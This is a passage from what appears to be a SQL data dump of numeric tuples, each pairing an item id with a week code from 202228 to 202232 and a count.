2),(3287,1,'202228',2),(3307,1,'202228',2),(3430,1,'202228',2),(3738,1,'202228',2),(4357,1,'202228',2),(4368,1,'202228',2),(4432,1,'202228',2),(4668,1,'202228',2),(4741,1,'202228',2),(4756,1,'202228',2),(473,1,'202228',3),(479,1,'202228',3),(483,1,'202228',3),(1604,1,'202228',3),(1608,1,'202228',3),(1724,1,'202228',3),(1747,1,'202228',3),(1751,1,'202228',3),(1782,1,'202228',3),(2063,1,'202228',3),(2457,1,'202228',3),(2617,1,'202228',3),(2658,1,'202228',3),(2769,1,'202228',3),(2911,1,'202228',3),(2964,1,'202228',3),(3041,1,'202228',3),(3079,1,'202228',3),(3251,1,'202228',3),(3259,1,'202228',3),(3263,1,'202228',3),(3265,1,'202228',3),(3267,1,'202228',3),(3275,1,'202228',3),(3278,1,'202228',3),(3316,1,'202228',3),(3746,1,'202228',3),(3749,1,'202228',3),(4275,1,'202228',3),(4301,1,'202228',3),(4329,1,'202228',3),(4332,1,'202228',3),(4335,1,'202228',3),(4448,1,'202228',3),(4514,1,'202228',3),(4556,1,'202228',3),(4587,1,'202228',3),(4688,1,'202228',3),(4750,1,'202228',3),(470,1,'202228',4),(471,1,'202228',4),(472,1,'202228',4),(481,1,'202228',4),(482,1,'202228',4),(484,1,'202228',4),(485,1,'202228',4),(488,1,'202228',4),(1592,1,'202228',4),(1598,1,'202228',4),(1728,1,'202228',4),(1732,1,'202228',4),(1766,1,'202228',4),(1770,1,'202228',4),(2252,1,'202228',4),(2704,1,'202228',4),(2751,1,'202228',4),(2801,1,'202228',4),(3045,1,'202228',4),(3083,1,'202228',4),(3090,1,'202228',4),(3102,1,'202228',4),(3245,1,'202228',4),(3285,1,'202228',4),(3531,1,'202228',4),(3710,1,'202228',4),(3735,1,'202228',4),(3774,1,'202228',4),(3777,1,'202228',4),(4612,1,'202228',4),(4648,1,'202228',4),(1614,1,'202228',5),(1743,1,'202228',5),(2165,1,'202228',5),(2609,1,'202228',5),(2775,1,'202228',5),(3023,1,'202228',5),(3087,1,'202228',5),(3290,1,'202228',5),(3482,1,'202228',5),(3714,1,'202228',5),(3727,1,'202228',5),(3731,1,'202228',5),(4546,1,'202228',5),(4566,1,'202228',5),(4697,1,'202228',5),(4747,1,'202228',5),(4753,1,'202228',5),(4762,1,'202228',5),(4768,1,'202228',5),(335,1,'202228',6),(468,1,'202228',6),(469,1,'202228',6),(476,1,'202228',6),(487,1,'202228',6),(1588,1,'202228',6),(1606,1,'202228',6),(1780,1,'202228',6),(2159,1,'202228',6),(2297,1,'202228',6),(3005,1,'202228',6),(3072,1,'202228',6),(3498,1,'202228',6),(3534,1,'202228',6),(3721,1,'202228',6),(4454,1,'202228',6),(4551,1,'202228',6),(4700,1,'202228',6),(4712,1,'202228',6),(4771,1,'202228',6),(467,1,'202228',7),(474,1,'202228',7),(478,1,'202228',7),(480,1,'202228',7),(486,1,'202228',7),(1584,1,'202228',7),(2813,1,'202228',7),(3479,1,'202228',7),(3724,1,'202228',7),(4416,1,'202228',7),(4709,1,'202228',7),(4759,1,'202228',7),(4765,1,'202228',7),(477,1,'202228',8),(2152,1,'202228',8),(2503,1,'202228',8),(3038,1,'202228',8),(3771,1,'202228',8),(4582,1,'202228',8),(4657,1,'202228',8),(4691,1,'202228',8),(4703,1,'202228',8),(4323,1,'202228',9),(4517,1,'202228',9),(4660,1,'202228',9),(4663,1,'202228',9),(4685,1,'202228',9),(4706,1,'202228',9),(1610,1,'202228',10),(3742,1,'202228',10),(4326,1,'202228',10),(4412,1,'202228',10),(4420,1,'202228',10),(4457,1,'202228',10),(4524,1,'202228',10),(4651,1,'202228',10),(4654,1,'202228',10),(4694,1,'202228',10),(1582,1,'202228',11),(4677,1,'202228',11),(4722,1,'202228',11),(87,1,'202228',12),(3127,1,'202228',12),(3313,1,'202228',12),(3489,1,'202228',12),(3764,1,'202228',12),(3781,1,'202228',12),(4338,1,'202228',12),(4400,1,'202228',12),(4645,1,'202228',12),(4674,1,'202228',12),(84,1,'202228',13),(108,1,'202228',13),(3027,1,'202228',13),(3060,1,'202228',13),(3066,1,'202228',13),(3069,1,'202228',13),(76,1,'202228',14),(91,1,'202228',14),(1544,1,'202228',14),(1600,1,'202228',14),(1612,1,'202228',14),(1722,1,'202228',14),(2804,1,'202228',14),(3117,1,'202228',14),(68,1,'202228',15),(1594,1,'202228',15),(1596,1,'202228',15),(2809,1,'202228',15),(3063,1,'202228',15),(74,1,'202228',16),(89,1,'202228',16),(3030,1,'202228',16),(4520,1,'202228',16),(1602,1,'202228',17),(4529,1,'202228',17),(4776,1,'202228',17),(2309,1,'202228',25),(1586,1,'202228',39),(72,1,'202228',44),(2904,1,'202228',56),(80,1,'202228',62),(9,1,'202228',840),(110,1,'202229',1),(1695,1,'202229',1),(1709,1,'202229',1),(1713,1,'202229',1),(1732,1,'202229',1),(1745,1,'202229',1),(2248,1,'202229',1),(2252,1,'202229',1),(3263,1,'202229',1),(3265,1,'202229',1),(1697,1,'202229',2),(1699,1,'202229',2),(1705,1,'202229',2),(1707,1,'202229',2),(1711,1,'202229',2),(1743,1,'202229',2),(1749,1,'202229',2),(1776,1,'202229',2),(2063,1,'202229',2),(2165,1,'202229',2),(2296,1,'202229',2),(2748,1,'202229',2),(2965,1,'202229',2),(2993,1,'202229',2),(3083,1,'202229',2),(3226,1,'202229',2),(3240,1,'202229',2),(3245,1,'202229',2),(3249,1,'202229',2),(3273,1,'202229',2),(3287,1,'202229',2),(4377,1,'202229',2),(4448,1,'202229',2),(102,1,'202229',3),(471,1,'202229',3),(479,1,'202229',3),(484,1,'202229',3),(488,1,'202229',3),(1592,1,'202229',3),(1604,1,'202229',3),(1718,1,'202229',3),(1726,1,'202229',3),(1730,1,'202229',3),(1734,1,'202229',3),(1737,1,'202229',3),(1747,1,'202229',3),(1751,1,'202229',3),(2148,1,'202229',3),(2154,1,'202229',3),(2156,1,'202229',3),(2161,1,'202229',3),(2558,1,'202229',3),(2658,1,'202229',3),(2775,1,'202229',3),(2989,1,'202229',3),(3005,1,'202229',3),(3023,1,'202229',3),(3038,1,'202229',3),(3079,1,'202229',3),(3097,1,'202229',3),(3104,1,'202229',3),(3107,1,'202229',3),(3229,1,'202229',3),(3243,1,'202229',3),(3247,1,'202229',3),(3253,1,'202229',3),(3257,1,'202229',3),(3259,1,'202229',3),(3261,1,'202229',3),(3267,1,'202229',3),(3280,1,'202229',3),(3290,1,'202229',3),(3534,1,'202229',3),(3714,1,'202229',3),(3752,1,'202229',3),(4329,1,'202229',3),(4341,1,'202229',3),(4357,1,'202229',3),(4363,1,'202229',3),(4373,1,'202229',3),(4387,1,'202229',3),(4408,1,'202229',3),(4432,1,'202229',3),(4436,1,'202229',3),(4454,1,'202229',3),(4556,1,'202229',3),(4591,1,'202229',3),(4668,1,'202229',3),(4741,1,'202229',3),(4744,1,'202229',3),(4747,1,'202229',3),(4750,1,'202229',3),(74,1,'202229',4),(473,1,'202229',4),(477,1,'202229',4),(480,1,'202229',4),(481,1,'202229',4),(487,1,'202229',4),(1701,1,'202229',4),(1703,1,'202229',4),(1715,1,'202229',4),(1720,1,'202229',4),(1724,1,'202229',4),(1739,1,'202229',4),(1741,1,'202229',4),(2150,1,'202229',4),(2178,1,'202229',4),(2297,1,'202229',4),(2609,1,'202229',4),(2751,1,'202229',4),(2769,1,'202229',4),(2813,1,'202229',4),(2956,1,'202229',4),(3034,1,'202229',4),(3041,1,'202229',4),(3072,1,'202229',4),(3087,1,'202229',4),(3090,1,'202229',4),(3102,1,'202229',4),(3109,1,'202229',4),(3251,1,'202229',4),(3269,1,'202229',4),(3271,1,'202229',4),(3275,1,'202229',4),(3282,1,'202229',4),(3430,1,'202229',4),(3482,1,'202229',4),(3498,1,'202229',4),(3531,1,'202229',4),(3541,1,'202229',4),(3724,1,'202229',4),(3727,1,'202229',4),(3731,1,'202229',4),(3738,1,'202229',4),(3746,1,'202229',4),(3749,1,'202229',4),(3771,1,'202229',4),(4238,1,'202229',4),(4301,1,'202229',4),(4368,1,'202229',4),(4382,1,'202229',4),(4391,1,'202229',4),(4396,1,'202229',4),(4404,1,'202229',4),(4428,1,'202229',4),(4440,1,'202229',4),(4444,1,'202229',4),(4517,1,'202229',4),(4524,1,'202229',4),(4546,1,'202229',4),(4551,1,'202229',4),(4587,1,'202229',4),(4608,1,'202229',4),(4612,1,'202229',4),(4648,1,'202229',4),(4756,1,'202229',4),(4762,1,'202229',4),(108,1,'202229',5),(476,1,'202229',5),(478,1,'202229',5),(482,1,'202229',5),(486,1,'202229',5),(1598,1,'202229',5),(1608,1,'202229',5),(1766,1,'202229',5),(1770,1,'202229',5),(1772,1,'202229',5),(1778,1,'202229',5),(2159,1,'202229',5),(2911,1,'202229',5),(3006,1,'202229',5),(3045,1,'202229',5),(3092,1,'202229',5),(3096,1,'202229',5),(3124,1,'202229',5),(3278,1,'202229',5),(3307,1,'202229',5),(3316,1,'202229',5),(3710,1,'202229',5),(3721,1,'202229',5),(3777,1,'202229',5),(4275,1,'202229',5),(4332,1,'202229',5),(4424,1,'202229',5),(4514,1,'202229',5),(4566,1,'202229',5),(4681,1,'202229',5),(4688,1,'202229',5),(4712,1,'202229',5),(467,1,'202229',6),(468,1,'202229',6),(469,1,'202229',6),(470,1,'202229',6),(472,1,'202229',6),(474,1,'202229',6),(485,1,'202229',6),(1584,1,'202229',6),(1588,1,'202229',6),(1606,1,'202229',6),(2309,1,'202229',6),(2991,1,'202229',6),(3285,1,'202229',6),(3297,1,'202229',6),(3438,1,'202229',6),(3479,1,'202229',6),(3486,1,'202229',6),(4335,1,'202229',6),(4542,1,'202229',6),(4697,1,'202229',6),(4753,1,'202229',6),(4759,1,'202229',6),(570,1,'202229',7),(1544,1,'202229',7),(1590,1,'202229',7),(1728,1,'202229',7),(1768,1,'202229',7),(2457,1,'202229',7),(3004,1,'202229',7),(3735,1,'202229',7),(3774,1,'202229',7),(4457,1,'202229',7),(4651,1,'202229',7),(4691,1,'202229',7),(4709,1,'202229',7),(4765,1,'202229',7),(4768,1,'202229',7),(335,1,'202229',8),(483,1,'202229',8),(1612,1,'202229',8),(2617,1,'202229',8),(2801,1,'202229',8),(3027,1,'202229',8),(3069,1,'202229',8),(3742,1,'202229',8),(4416,1,'202229',8),(4645,1,'202229',8),(4660,1,'202229',8),(4776,1,'202229',8),(1582,1,'202229',9),(1600,1,'202229',9),(1722,1,'202229',9),(1774,1,'202229',9),(2503,1,'202229',9),(2804,1,'202229',9),(2964,1,'202229',9),(3030,1,'202229',9),(3489,1,'202229',9),(4326,1,'202229',9),(4663,1,'202229',9),(4674,1,'202229',9),(4685,1,'202229',9),(4771,1,'202229',9),(84,1,'202229',10),(91,1,'202229',10),(1610,1,'202229',10),(1614,1,'202229',10),(1780,1,'202229',10),(2152,1,'202229',10),(2809,1,'202229',10),(3066,1,'202229',10),(3127,1,'202229',10),(3313,1,'202229',10),(4338,1,'202229',10),(4400,1,'202229',10),(4654,1,'202229',10),(4657,1,'202229',10),(4706,1,'202229',10),(76,1,'202229',11),(87,1,'202229',11),(3063,1,'202229',11),(4412,1,'202229',11),(4582,1,'202229',11),(4694,1,'202229',11),(3060,1,'202229',12),(4420,1,'202229',12),(4722,1,'202229',12),(3117,1,'202229',13),(4323,1,'202229',13),(4529,1,'202229',13),(4703,1,'202229',13),(89,1,'202229',14),(3781,1,'202229',14),(4520,1,'202229',14),(4700,1,'202229',14),(1596,1,'202229',15),(4677,1,'202229',15),(3764,1,'202229',19),(68,1,'202229',20),(1594,1,'202229',22),(1602,1,'202229',22),(2904,1,'202229',26),(72,1,'202229',41),(1586,1,'202229',49),(80,1,'202229',59),(9,1,'202229',715),(1726,1,'202230',1),(2956,1,'202230',1),(3005,1,'202230',1),(3038,1,'202230',1),(3079,1,'202230',1),(3257,1,'202230',1),(4275,1,'202230',1),(110,1,'202230',2),(485,1,'202230',2),(1604,1,'202230',2),(1747,1,'202230',2),(2150,1,'202230',2),(2165,1,'202230',2),(2658,1,'202230',2),(2991,1,'202230',2),(3006,1,'202230',2),(3023,1,'202230',2),(3041,1,'202230',2),(3087,1,'202230',2),(3104,1,'202230',2),(3226,1,'202230',2),(3245,1,'202230',2),(3278,1,'202230',2),(3307,1,'202230',2),(3316,1,'202230',2),(3486,1,'202230',2),(3489,1,'202230',2),(3724,1,'202230',2),(3771,1,'202230',2),(4301,1,'202230',2),(4335,1,'202230',2),(4357,1,'202230',2),(4377,1,'202230',2),(4517,1,'202230',2),(4524,1,'202230',2),(4556,1,'202230',2),(4566,1,'202230',2),(4587,1,'202230',2),(4688,1,'202230',2),(4744,1,'202230',2),(4792,1,'202230',2),(4802,1,'202230',2),(106,1,'202230',3),(467,1,'202230',3),(476,1,'202230',3),(477,1,'202230',3),(479,1,'202230',3),(480,1,'202230',3),(486,1,'202230',3),(488,1,'202230',3),(1699,1,'202230',3),(1705,1,'202230',3),(1711,1,'202230',3),(1718,1,'202230',3),(1720,1,'202230',3),(1724,1,'202230',3),(1734,1,'202230',3),(1739,1,'202230',3),(1743,1,'202230',3),(1745,1,'202230',3),(1749,1,'202230',3),(1768,1,'202230',3),(1778,1,'202230',3),(2154,1,'202230',3),(2156,1,'202230',3),(2161,1,'202230',3),(2252,1,'202230',3),(2617,1,'202230',3),(2704,1,'202230',3),(2751,1,'202230',3),(2769,1,'202230',3),(2775,1,'202230',3),(2965,1,'202230',3),(2989,1,'202230',3),(2993,1,'202230',3),(3004,1,'202230',3),(3096,1,'202230',3),(3109,1,'202230',3),(3240,1,'202230',3),(3249,1,'202230',3),(3253,1,'202230',3),(3263,1,'202230',3),(3271,1,'202230',3),(3275,1,'202230',3),(3280,1,'202230',3),(3287,1,'202230',3),(3482,1,'202230',3),(3531,1,'202230',3),(3534,1,'202230',3),(3710,1,'202230',3),(3714,1,'202230',3),(3721,1,'202230',3),(3774,1,'202230',3),(3777,1,'202230',3),(4332,1,'202230',3),(4363,1,'202230',3),(4373,1,'202230',3),(4396,1,'202230',3),(4436,1,'202230',3),(4440,1,'202230',3),(4444,1,'202230',3),(4454,1,'202230',3),(4514,1,'202230',3),(4612,1,'202230',3),(4648,1,'202230',3),(4668,1,'202230',3),(4681,1,'202230',3),(4697,1,'202230',3),(4753,1,'202230',3),(4797,1,'202230',3),(468,1,'202230',4),(473,1,'202230',4),(478,1,'202230',4),(481,1,'202230',4),(482,1,'202230',4),(483,1,'202230',4),(484,1,'202230',4),(570,1,'202230',4),(1590,1,'202230',4),(1592,1,'202230',4),(1697,1,'202230',4),(1707,1,'202230',4),(1713,1,'202230',4),(1715,1,'202230',4),(1728,1,'202230',4),(1730,1,'202230',4),(1732,1,'202230',4),(1737,1,'202230',4),(1741,1,'202230',4),(1770,1,'202230',4),(1772,1,'202230',4),(1774,1,'202230',4),(1776,1,'202230',4),(1782,1,'202230',4),(2063,1,'202230',4),(2148,1,'202230',4),(2178,1,'202230',4),(2609,1,'202230',4),(2801,1,'202230',4),(3034,1,'202230',4),(3097,1,'202230',4),(3102,1,'202230',4),(3229,1,'202230',4),(3251,1,'202230',4),(3259,1,'202230',4),(3269,1,'202230',4),(3282,1,'202230',4),(3290,1,'202230',4),(3430,1,'202230',4),(3438,1,'202230',4),(3727,1,'202230',4),(3731,1,'202230',4),(3738,1,'202230',4),(3749,1,'202230',4),(4238,1,'202230',4),(4329,1,'202230',4),(4341,1,'202230',4),(4382,1,'202230',4),(4408,1,'202230',4),(4424,1,'202230',4),(4546,1,'202230',4),(4591,1,'202230',4),(4712,1,'202230',4),(4741,1,'202230',4),(4747,1,'202230',4),(4759,1,'202230',4),(102,1,'202230',5),(470,1,'202230',5),(471,1,'202230',5),(472,1,'202230',5),(487,1,'202230',5),(1709,1,'202230',5),(1751,1,'202230',5),(1766,1,'202230',5),(2159,1,'202230',5),(2248,1,'202230',5),(2293,1,'202230',5),(2296,1,'202230',5),(2748,1,'202230',5),(2813,1,'202230',5),(2911,1,'202230',5),(2964,1,'202230',5),(3083,1,'202230',5),(3243,1,'202230',5),(3247,1,'202230',5),(3261,1,'202230',5),(3265,1,'202230',5),(3267,1,'202230',5),(3273,1,'202230',5),(3285,1,'202230',5),(3297,1,'202230',5),(3498,1,'202230',5),(3541,1,'202230',5),(3735,1,'202230',5),(3752,1,'202230',5),(4387,1,'202230',5),(4391,1,'202230',5),(4404,1,'202230',5),(4432,1,'202230',5),(4542,1,'202230',5),(4551,1,'202230',5),(4750,1,'202230',5),(4762,1,'202230',5),(1584,1,'202230',6),(1606,1,'202230',6),(1614,1,'202230',6),(1695,1,'202230',6),(1703,1,'202230',6),(2457,1,'202230',6),(2558,1,'202230',6),(3045,1,'202230',6),(3092,1,'202230',6),(3107,1,'202230',6),(3124,1,'202230',6),(3746,1,'202230',6),(4368,1,'202230',6),(4412,1,'202230',6),(4756,1,'202230',6),(4765,1,'202230',6),(74,1,'202230',7),(474,1,'202230',7),(1588,1,'202230',7),(1701,1,'202230',7),(2297,1,'202230',7),(3060,1,'202230',7),(3479,1,'202230',7),(4448,1,'202230',7),(4457,1,'202230',7),(4768,1,'202230',7),(469,1,'202230',8),(1544,1,'202230',8),(1600,1,'202230',8),(2804,1,'202230',8),(4428,1,'202230',8),(4608,1,'202230',8),(4700,1,'202230',8),(87,1,'202230',9),(91,1,'202230',9),(335,1,'202230',9),(1598,1,'202230',9),(1722,1,'202230',9),(1780,1,'202230',9),(2309,1,'202230',9),(3063,1,'202230',9),(3090,1,'202230',9),(3764,1,'202230',9),(4338,1,'202230',9),(4654,1,'202230',9),(4703,1,'202230',9),(84,1,'202230',10),(108,1,'202230',10),(1610,1,'202230',10),(3117,1,'202230',10),(3127,1,'202230',10),(3313,1,'202230',10),(4326,1,'202230',10),(4400,1,'202230',10),(4416,1,'202230',10),(4529,1,'202230',10),(4660,1,'202230',10),(4685,1,'202230',10),(4691,1,'202230',10),(4706,1,'202230',10),(4709,1,'202230',10),(4771,1,'202230',10),(1594,1,'202230',11),(2152,1,'202230',11),(3027,1,'202230',11),(3069,1,'202230',11),(4323,1,'202230',11),(4645,1,'202230',11),(4651,1,'202230',11),(4657,1,'202230',11),(4663,1,'202230',11),(4677,1,'202230',11),(4694,1,'202230',11),(4776,1,'202230',11),(1612,1,'202230',12),(2503,1,'202230',12),(2809,1,'202230',12),(3030,1,'202230',12),(4520,1,'202230',12),(4674,1,'202230',12),(4722,1,'202230',12),(76,1,'202230',13),(1596,1,'202230',13),(1608,1,'202230',13),(3066,1,'202230',13),(3742,1,'202230',13),(3781,1,'202230',13),(4582,1,'202230',13),(1582,1,'202230',14),(4420,1,'202230',14),(1602,1,'202230',15),(3072,1,'202230',17),(89,1,'202230',19),(72,1,'202230',31),(68,1,'202230',32),(1586,1,'202230',35),(2904,1,'202230',38),(80,1,'202230',59),(9,1,'202230',767),(1604,1,'202231',2),(1747,1,'202231',2),(4408,1,'202231',2),(110,1,'202231',3),(470,1,'202231',3),(473,1,'202231',3),(474,1,'202231',3),(1592,1,'202231',3),(1701,1,'202231',3),(1705,1,'202231',3),(1713,1,'202231',3),(2293,1,'202231',3),(2609,1,'202231',3),(2704,1,'202231',3),(2964,1,'202231',3),(2993,1,'202231',3),(3087,1,'202231',3),(3104,1,'202231',3),(3107,1,'202231',3),(3240,1,'202231',3),(3251,1,'202231',3),(3263,1,'202231',3),(3265,1,'202231',3),(3267,1,'202231',3),(4373,1,'202231',3),(4382,1,'202231',3),(4387,1,'202231',3),(4436,1,'202231',3),(4546,1,'202231',3),(4556,1,'202231',3),(4587,1,'202231',3),(4648,1,'202231',3),(4741,1,'202231',3),(476,1,'202231',4),(477,1,'202231',4),(481,1,'202231',4),(484,1,'202231',4),(488,1,'202231',4),(1695,1,'202231',4),(1697,1,'202231',4),(1715,1,'202231',4),(1718,1,'202231',4),(1730,1,'202231',4),(1734,1,'202231',4),(1739,1,'202231',4),(1749,1,'202231',4),(1766,1,'202231',4),(1768,1,'202231',4),(1770,1,'202231',4),(1776,1,'202231',4),(1778,1,'202231',4),(2154,1,'202231',4),(2296,1,'202231',4),(2965,1,'202231',4),(2989,1,'202231',4),(2991,1,'202231',4),(3005,1,'202231',4),(3034,1,'202231',4),(3041,1,'202231',4),(3090,1,'202231',4),(3092,1,'202231',4),(3097,1,'202231',4),(3229,1,'202231',4),(3247,1,'202231',4),(3259,1,'202231',4),(3261,1,'202231',4),(3269,1,'202231',4),(3273,1,'202231',4),(3287,1,'202231',4),(3482,1,'202231',4),(3714,1,'202231',4),(3731,1,'202231',4),(3746,1,'202231',4),(3771,1,'202231',4),(4275,1,'202231',4),(4301,1,'202231',4),(4332,1,'202231',4),(4341,1,'202231',4),(4363,1,'202231',4),(4368,1,'202231',4),(4377,1,'202231',4),(4391,1,'202231',4),(4396,1,'202231',4),(4432,1,'202231',4),(4440,1,'202231',4),(4444,1,'202231',4),(4542,1,'202231',4),(4591,1,'202231',4),(4612,1,'202231',4),(4668,1,'202231',4),(4681,1,'202231',4),(4688,1,'202231',4),(4697,1,'202231',4),(4712,1,'202231',4),(4747,1,'202231',4),(4753,1,'202231',4),(467,1,'202231',5),(471,1,'202231',5),(480,1,'202231',5),(482,1,'202231',5),(483,1,'202231',5),(1598,1,'202231',5),(1707,1,'202231',5),(1709,1,'202231',5),(1711,1,'202231',5),(1720,1,'202231',5),(1732,1,'202231',5),(1743,1,'202231',5),(1745,1,'202231',5),(1751,1,'202231',5),(1772,1,'202231',5),(1774,1,'202231',5),(1782,1,'202231',5),(2063,1,'202231',5),(2150,1,'202231',5),(2159,1,'202231',5),(2161,1,'202231',5),(2178,1,'202231',5),(2248,1,'202231',5),(2297,1,'202231',5),(2558,1,'202231',5),(2617,1,'202231',5),(2748,1,'202231',5),(2751,1,'202231',5),(2769,1,'202231',5),(3004,1,'202231',5),(3079,1,'202231',5),(3096,1,'202231',5),(3109,1,'202231',5),(3124,1,'202231',5),(3243,1,'202231',5),(3249,1,'202231',5),(3253,1,'202231',5),(3257,1,'202231',5),(3280,1,'202231',5),(3438,1,'202231',5),(3498,1,'202231',5),(3541,1,'202231',5),(3710,1,'202231',5),(3721,1,'202231',5),(3724,1,'202231',5),(3727,1,'202231',5),(3738,1,'202231',5),(3749,1,'202231',5),(3774,1,'202231',5),(4329,1,'202231',5),(4357,1,'202231',5),(4404,1,'202231',5),(4448,1,'202231',5),(4514,1,'202231',5),(4551,1,'202231',5),(4608,1,'202231',5),(4744,1,'202231',5),(4750,1,'202231',5),(4756,1,'202231',5),(469,1,'202231',6),(479,1,'202231',6),(487,1,'202231',6),(570,1,'202231',6),(1600,1,'202231',6),(1606,1,'202231',6),(1726,1,'202231',6),(1737,1,'202231',6),(1741,1,'202231',6),(2156,1,'202231',6),(2658,1,'202231',6),(2775,1,'202231',6),(2801,1,'202231',6),(2956,1,'202231',6),(3006,1,'202231',6),(3023,1,'202231',6),(3038,1,'202231',6),(3045,1,'202231',6),(3226,1,'202231',6),(3275,1,'202231',6),(3285,1,'202231',6),(3290,1,'202231',6),(3316,1,'202231',6),(3430,1,'202231',6),(3531,1,'202231',6),(3735,1,'202231',6),(4238,1,'202231',6),(4428,1,'202231',6),(4524,1,'202231',6),(4566,1,'202231',6),(4762,1,'202231',6),(4792,1,'202231',6),(102,1,'202231',7),(478,1,'202231',7),(486,1,'202231',7),(1584,1,'202231',7),(1588,1,'202231',7),(1590,1,'202231',7),(1699,1,'202231',7),(1703,1,'202231',7),(1728,1,'202231',7),(2165,1,'202231',7),(2252,1,'202231',7),(3072,1,'202231',7),(3102,1,'202231',7),(3278,1,'202231',7),(3307,1,'202231',7),(3486,1,'202231',7),(3534,1,'202231',7),(3777,1,'202231',7),(4335,1,'202231',7),(4454,1,'202231',7),(4759,1,'202231',7),(4768,1,'202231',7),(4797,1,'202231',7),(4802,1,'202231',7),(468,1,'202231',8),(472,1,'202231',8),(485,1,'202231',8),(1544,1,'202231',8),(1724,1,'202231',8),(2457,1,'202231',8),(3060,1,'202231',8),(3245,1,'202231',8),(3271,1,'202231',8),(3282,1,'202231',8),(3479,1,'202231',8),(4416,1,'202231',8),(4424,1,'202231',8),(4517,1,'202231',8),(4651,1,'202231',8),(4694,1,'202231',8),(4765,1,'202231',8),(4771,1,'202231',8),(4776,1,'202231',8),(1582,1,'202231',9),(1780,1,'202231',9),(2148,1,'202231',9),(2309,1,'202231',9),(2911,1,'202231',9),(3297,1,'202231',9),(3742,1,'202231',9),(3752,1,'202231',9),(2813,1,'202231',10),(3127,1,'202231',10),(4338,1,'202231',10),(4582,1,'202231',10),(4645,1,'202231',10),(4657,1,'202231',10),(4663,1,'202231',10),(4700,1,'202231',10),(4703,1,'202231',10),(4709,1,'202231',10),(87,1,'202231',11),(1722,1,'202231',11),(2804,1,'202231',11),(3030,1,'202231',11),(3083,1,'202231',11),(3489,1,'202231',11),(4400,1,'202231',11),(4412,1,'202231',11),(4457,1,'202231',11),(4529,1,'202231',11),(4654,1,'202231',11),(4674,1,'202231',11),(4685,1,'202231',11),(4691,1,'202231',11),(108,1,'202231',12),(335,1,'202231',12),(1608,1,'202231',12),(1614,1,'202231',12),(2152,1,'202231',12),(3066,1,'202231',12),(3117,1,'202231',12),(3313,1,'202231',12),(4660,1,'202231',12),(4677,1,'202231',12),(4706,1,'202231',12),(76,1,'202231',13),(3063,1,'202231',13),(3069,1,'202231',13),(1610,1,'202231',14),(1612,1,'202231',14),(3027,1,'202231',14),(3764,1,'202231',14),(4323,1,'202231',14),(4326,1,'202231',14),(4520,1,'202231',14),(74,1,'202231',15),(1602,1,'202231',15),(2809,1,'202231',15),(4722,1,'202231',15),(84,1,'202231',16),(89,1,'202231',18),(3781,1,'202231',20),(4420,1,'202231',20),(91,1,'202231',21),(68,1,'202231',22),(1594,1,'202231',22),(2503,1,'202231',22),(1596,1,'202231',24),(72,1,'202231',30),(1586,1,'202231',38),(2904,1,'202231',41),(80,1,'202231',65),(9,1,'202231',788),(106,1,'202232',1),(470,1,'202232',1),(1695,1,'202232',1),(1699,1,'202232',1),(1701,1,'202232',1),(1705,1,'202232',1),(1715,1,'202232',1),(1730,1,'202232',1),(1737,1,'202232',1),(1739,1,'202232',1),(1745,1,'202232',1),(1747,1,'202232',1),(1749,1,'202232',1),(1772,1,'202232',1),(1774,1,'202232',1),(1782,1,'202232',1),(2148,1,'202232',1),(2161,1,'202232',1),(2178,1,'202232',1),(2248,1,'202232',1),(2293,1,'202232',1),(2297,1,'202232',1),(2457,1,'202232',1),(2964,1,'202232',1),(2965,1,'202232',1),(2991,1,'202232',1),(3034,1,'202232',1),(3041,1,'202232',1),(3087,1,'202232',1),(3104,1,'202232',1),(3240,1,'202232',1),(3243,1,'202232',1),(3249,1,'202232',1),(3253,1,'202232',1),(3259,1,'202232',1),(3280,1,'202232',1),(3282,1,'202232',1),(3287,1,'202232',1),(3297,1,'202232',1),(3438,1,'202232',1),(3486,1,'202232',1),(3498,1,'202232',1),(3721,1,'202232',1),(3727,1,'202232',1),(3735,1,'202232',1),(3738,1,'202232',1),(3771,1,'202232',1),(3774,1,'202232',1),(3777,1,'202232',1),(4238,1,'202232',1),(4332,1,'202232',1),(4335,1,'202232',1),(4377,1,'202232',1),(4382,1,'202232',1),(4404,1,'202232',1),(4432,1,'202232',1),(4436,1,'202232',1),(4444,1,'202232',1),(4454,1,'202232',1),(4587,1,'202232',1),(4668,1,'202232',1),(4688,1,'202232',1),(4697,1,'202232',1),(4712,1,'202232',1),(4753,1,'202232',1),(4756,1,'202232',1),(4762,1,'202232',1),(4797,1,'202232',1),(4802,1,'202232',1),(4858,1,'202232',1),(4862,1,'202232',1),(4866,1,'202232',1),(4870,1,'202232',1),(4874,1,'202232',1),(4878,1,'202232',1),(4883,1,'202232',1),(4888,1,'202232',1),(4893,1,'202232',1),(4897,1,'202232',1),(473,1,'202232',2),(477,1,'202232',2),(479,1,'202232',2),(481,1,'202232',2),(483,1,'202232',2),(570,1,'202232',2),(1584,1,'202232',2),(1590,1,'202232',2),(1592,1,'202232',2),(1614,1,'202232',2),(1726,1,'202232',2),(1732,1,'202232',2),(1743,1,'202232',2),(1768,1,'202232',2),(1776,1,'202232',2),(2063,1,'202232',2),(2150,1,'202232',2),(2154,1,'202232',2),(2159,1,'202232',2),(2165,1,'202232',2),(2617,1,'202232',2),(2775,1,'202232',2),(2801,1,'202232',2),(2911,1,'202232',2),(3005,1,'202232',2),(3006,1,'202232',2),(3079,1,'202232',2),(3092,1,'202232',2),(3109,1,'202232',2),(3124,1,'202232',2),(3226,1,'202232',2),(3251,1,'202232',2),(3257,1,'202232',2),(3265,1,'202232',2),(3271,1,'202232',2),(3275,1,'202232',2),(3278,1,'202232',2),(3307,1,'202232',2),(3714,1,'202232',2),(3749,1,'202232',2),(3752,1,'202232',2),(4341,1,'202232',2),(4396,1,'202232',2),(4408,1,'202232',2),(4440,1,'202232',2),(4514,1,'202232',2),(4517,1,'202232',2),(4524,1,'202232',2),(4546,1,'202232',2),(4566,1,'202232',2),(4591,1,'202232',2),(4608,1,'202232',2),(4741,1,'202232',2),(4744,1,'202232',2),(4750,1,'202232',2),(467,1,'202232',3),(468,1,'202232',3),(469,1,'202232',3),(471,1,'202232',3),(472,1,'202232',3),(476,1,'202232',3),(480,1,'202232',3),(484,1,'202232',3),(488,1,'202232',3),(1598,1,'202232',3),(1604,1,'202232',3),(1718,1,'202232',3),(1724,1,'202232',3),(1728,1,'202232',3),(1741,1,'202232',3),(1766,1,'202232',3),(1778,1,'202232',3),(2252,1,'202232',3),(2658,1,'202232',3),(2748,1,'202232',3),(2751,1,'202232',3),(2989,1,'202232',3),(3045,1,'202232',3),(3060,1,'202232',3),(3102,1,'202232',3),(3247,1,'202232',3),(3267,1,'202232',3),(3290,1,'202232',3),(3479,1,'202232',3),(